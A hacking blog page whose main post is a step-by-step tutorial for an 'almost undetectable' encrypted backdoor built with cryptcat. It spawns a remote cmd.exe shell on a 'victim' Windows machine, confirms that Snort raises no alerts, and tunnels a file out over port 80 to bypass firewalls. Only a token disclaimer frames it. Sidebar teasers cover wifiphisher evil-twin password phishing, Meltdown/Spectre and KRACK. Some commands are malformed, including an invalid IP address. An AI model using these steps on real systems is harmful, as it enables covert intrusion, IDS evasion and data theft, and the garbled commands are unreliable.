Meltdown & Spectre First Off i Wanna apologize to My Readers for my long absence, a lot of crucial things have been happening in my life for the past 4-5 months, and finally my high school is over and i'm waiting for my reports. From now on, i'll be posting blogs every two weeks or so (that'll get shorter soon). Today's blog is all about Meltdown and Spectre, these are the two security bugs that can cause chaos to almost any processor that has been manufactured till this day. Most of the viruses tries to exploit the vulnerability in the code of a specific program they are designed to infect, this means that they can't affect programs or OSes they are not designed to affect so to a level we are almost safe. But the problem with these two are they function on a much closer to a hardware level so they can exploit almost any process...
Get link
Facebook
X
Pinterest
Email
Other Apps
Create a Backdoor Using CryptCat
Get link
Facebook
X
Pinterest
Email
Other Apps
Create An Undetectable Backdoor Using Cryptcat
Hey There Guys In This Tutorial I'm Going To Show You How To Create An Almost Undetectable BACKDOOR using Cryptcat
So Lets Get Cracking...
What Is Cryptcat ?
CryptCat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol while encrypting the data being transmitted. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.Cryptcat enables us to communicate between two systems and encrypts the communication between them with twofish, one of many excellent encryption algorithms from Bruce Schneier et al.Twofish's encryption is on par with AES encryption, making it nearly bulletproof. In this way, the IDS can't detect the malicious behavior taking place even when its traveling across normal HTTP ports like 80 and 443.
This tutorial is for Educational purposes only and should not be used for any illegal activities . IM NOT RESPONSIBLE IF YOU CAUSE ANY DAMAGE OR MISUSE IT .Don’t INTRUDE into someone's privacy.
Step I : Download Cryptcat You can download and install cryptcat on a Windows system using this link. Step II : Open a Listener on the Windows System We Will Be needing two Separate System For this tutorial One Loaded With WIN.7(Which I Prefer) & the Other With Backtrack/Kali We can open a listener on any system with a similar syntax as netcat. In this case, we're opening a listener on a Windows 7 system on port 6996 and spawning a command shell.
cryptcat -l -p 6996 -e cmd.exe
Step III : Open Snort
Now, Fire up IDS like Snort on another system that will connect to the Windows system to see whether the encryption is able to "blind" the IDS, leaving our backdoor invisible to such security devices.
Step IV : Connecting To The Windows System... Since cryptcat is installed by default on BackTrack, we don't have to download and install it. In addition, it's in a /bin directory, so we can access it from any directory.
Now, we can connect to the Windows 7 system with cryptcat from our BackTrack system and see whether we can complete an encrypted backdoor connection that is nearly impossible to detect.
cryptcat 192.168.4.182.248 6996
As you can see, we connected to the Windows 7 system and received a command shell from the Win 7 system! This gives us significant control over that system, but not total control as it has limits !. Step V: Checking your Snort Logs... This type of attack (passing a command shell across the wire) is easily detected with Snort or other IDS's when the connection is unencrypted. Snort rules will alert the sys-admin that a cmd.exe shell has traversed their network connection, and they are likely to do something then to keep you using that command shell. With the encrypted connection available with cryptcat, this connection should be nearly undetectable. Let's go back now and check your logs and alerts in Snort. If we were successful in evading the IDS, you should NOT see any alerts regarding command shell moving across the wire. We can check our logs by going to /var/snort/alerts and see whether any alerts have been triggered by our connection to the Windows machine.
kwrite /var/snort/alerts
Step VI: Sending Cryptcat to Bypass Firewall
Although we have successfully created an encrypted backdoor on the victim system, a vigilant security admin will notice that an unusual port (6996) is open. This will likely trigger some action by the security admin to limit our access. In addition, on systems with a good system admin and good firewall, this port will likely be blocked by the firewall. For any network to be able to communicate on the Internet, they will likely need to keep open ports 80 and 443, certainly, but also possibly 25, 53, and 110. Since unencrypted, normal Internet traffic travels over port 80, it's nearly always open and a little more traffic will hardly be noticed. Now that we have successfully used cryptcat, we'll send it over port 80 with all the other Internet traffic. Although it will be encrypted, it will look like any binary data crossing the wire. It will be nearly impossible for the security devices to detect or block it, as they must always allow traffic on port 80, and the traffic is encrypted, so the IDS can't "see" the contents. Here we will move a file from the victim's system called test.txt to our attack system without any of the security devices detecting it. This time, instead of sending a command shell across the wire, we will be sending a test file named test.txt across our encrypted connection. We can do this by typing at the Windows command prompt:
cryptcat -l p 80 < test.txt/doc (whatever the extension is.)
Step VII: Connecting To Listener.
Now, let's connect to the victim's system and pull across the test file. All we need to do is connect to the listener by typing cryptcat, the IP address of the victim system, and the port number of the listener.
cryptcat 192.168.182.248 80
Step VIII: Checking the Alert Files.
Let's once again check our Snort log files for any evidence that our IDS detected this movement of the top secret file.
Know The Wi-Fi Password. Using Wifiphisher In My First Tutorial I'm Going To Show You, How to Hack WiFi using wifiphisher. WiFiphisher is fast attack and reveals password without Taking Much of Your time. Wifiphisher Uses NO dictionaries, or brute force . let’s get started... What Is Wifiphisher? Wifiphisher is a security tool that mounts automated phishing attacks against WiFi networks in order to obtain secret passphrases or other credentials. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages or WPA/WPA2 secret passphrases. How It Works... WiFiphisher creates an evil twin AP, then DoS's all User Data from AP and when users re-authenticate, they are redirected to fake AP with the same SSID. After connecting with fake AP, they will see a legitimate looking webpage that requests their password to “Upgrade fir...
Meltdown & Spectre First Off i Wanna apologize to My Readers for my long absence, a lot of crucial things have been happening in my life for the past 4-5 months, and finally my high school is over and i'm waiting for my reports. From now on, i'll be posting blogs every two weeks or so (that'll get shorter soon). Today's blog is all about Meltdown and Spectre, these are the two security bugs that can cause chaos to almost any processor that has been manufactured till this day. Most of the viruses tries to exploit the vulnerability in the code of a specific program they are designed to infect, this means that they can't affect programs or OSes they are not designed to affect so to a level we are almost safe. But the problem with these two are they function on a much closer to a hardware level so they can exploit almost any process...
K ey R einstallation A tt ack Breaking WPA2 by Forcing Nonce Reuse Hey there READERS! Instead of How-to Post, today I'm Gonna be Posting About a Vulnerability Which Has Recently Been Discovered by Mathy Vanhoef Mathy Vanhoef, a postdoctoral computer researcher said: We have discovered serious weaknesses in WPA2, a protocol that secures all modern protected WI-FI Networks. An attacker within the range of a victim can exploit these weaknesses using Key Re-installation Attacks (KRACKs) As you might have heard or read About WPA2 (Wireless Protected Access II) the most common wireless protocol that you’ll find in use on networks such as home, public cafes, etc. Researchers have Found a serious flaw in the protocol which allows hackers within the range of the network decrypt password and access internet traffic. It can allow attackers to steal information such as credit cards, passwords, chat messages, email, photos, etc. An...
Comments
Post a Comment